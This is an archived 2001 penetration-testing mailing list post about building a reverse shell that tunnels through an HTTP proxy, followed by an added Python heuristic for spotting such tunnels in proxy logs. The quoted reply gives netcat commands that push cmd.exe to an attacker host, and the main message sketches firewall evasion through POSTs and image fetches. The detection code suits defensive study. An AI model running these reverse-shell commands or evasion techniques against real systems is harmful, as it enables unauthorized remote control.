
Penetration Testing mailing list archives

RE: Reverse Http Shell Solution
From: Frank Knobbe <FKnobbe () KnobbeITS com>
Date: Thu, 18 Oct 2001 20:55:58 -0500


-----Original Message-----
From: GrandmastrPlague () aol com [mailto:GrandmastrPlague () aol com]
Sent: Thursday, October 18, 2001 2:02 PM

It seems like this question has been asked a million times
before, but here goes the same old answer again... use netcat.
On attacker machine:
nc -l -p 80 
On victim machine: 
nc -d -e cmd.exe attacker 80 

Make sure you set up the listening machine first. 

I believe Vinícius meant that there is no way for a straight-through
connection as netcat would establish, but instead the requirement to
send GET requests to the proxy which will fetch a page for you.
Netcat won't do that. You would have to have a reverse shell that
operates on an HTTP GET and PUT basis.

You could modify netcat to do that. Instead of using TCP/UDP
connections, you can replace that mechanism with HTTP GET and PUT
ways of shuffling data, pumping that back to stdin/stdout. The only
catch is to fetch the data correctly as some firewalls will do
content inspection. One way to get around that is to pump data with
POSTs to a form as normal, but receive data via GETs from images in
the web page, or just request images à la http://h4x0r/data.gif.


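A defender's view of the tunnelling pattern described in the message above, as an added example that is not part of the original post: a Python heuristic over proxy logs that flags a client which POSTs to a host and keeps re-fetching the same image with changing response sizes. The log format, the thresholds and every sample line (including `form.cgi`, `search.cgi` and the `.example` host) are constructed assumptions.

```python
from collections import defaultdict
from urllib.parse import urlsplit

IMAGE_EXT = (".gif", ".jpg", ".jpeg", ".png")

# Constructed sample log. Assumed fields: epoch client method url status bytes.
SAMPLE_LOG = """\
1003456800 10.0.0.5 GET http://intranet.example/logo.gif 200 2048
1003456801 10.0.0.5 POST http://intranet.example/search.cgi 200 900
1003456830 10.0.0.5 GET http://intranet.example/logo.gif 200 2048
1003456860 10.0.0.5 GET http://intranet.example/logo.gif 200 2048
1003456900 10.0.0.9 POST http://h4x0r/form.cgi 200 120
1003456902 10.0.0.9 GET http://h4x0r/data.gif 200 311
1003456910 10.0.0.9 POST http://h4x0r/form.cgi 200 120
1003456912 10.0.0.9 GET http://h4x0r/data.gif 200 87
1003456920 10.0.0.9 POST http://h4x0r/form.cgi 200 120
1003456922 10.0.0.9 GET http://h4x0r/data.gif 200 1422
1003456930 10.0.0.9 GET http://h4x0r/data.gif 200 87
"""


def parse(log):
    """Yield (client, method, split_url, status, size); skip malformed lines."""
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 6:
            continue
        _, client, method, url, status, size = parts
        try:
            yield client, method, urlsplit(url), int(status), int(size)
        except ValueError:
            continue


def find_image_tunnels(log, min_fetches=3, min_sizes=3):
    """Flag (client, host) pairs that POST and re-fetch one image whose size keeps changing."""
    stats = defaultdict(lambda: {"posts": 0, "images": defaultdict(list)})
    for client, method, url, status, size in parse(log):
        entry = stats[(client, url.hostname or "")]
        if method == "POST":
            entry["posts"] += 1
        elif method == "GET" and status == 200 and url.path.lower().endswith(IMAGE_EXT):
            entry["images"][url.path].append(size)
    findings = []
    for (client, host), entry in sorted(stats.items()):
        for path, sizes in sorted(entry["images"].items()):
            if entry["posts"] and len(sizes) >= min_fetches and len(set(sizes)) >= min_sizes:
                findings.append((client, host, path, len(sizes), entry["posts"]))
    return findings
```

A static image returns the same byte count on every full fetch, so the benign client in the sample is not flagged. Dynamically generated images such as counters or charts will also match, so a hit is a lead for review, not a verdict.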

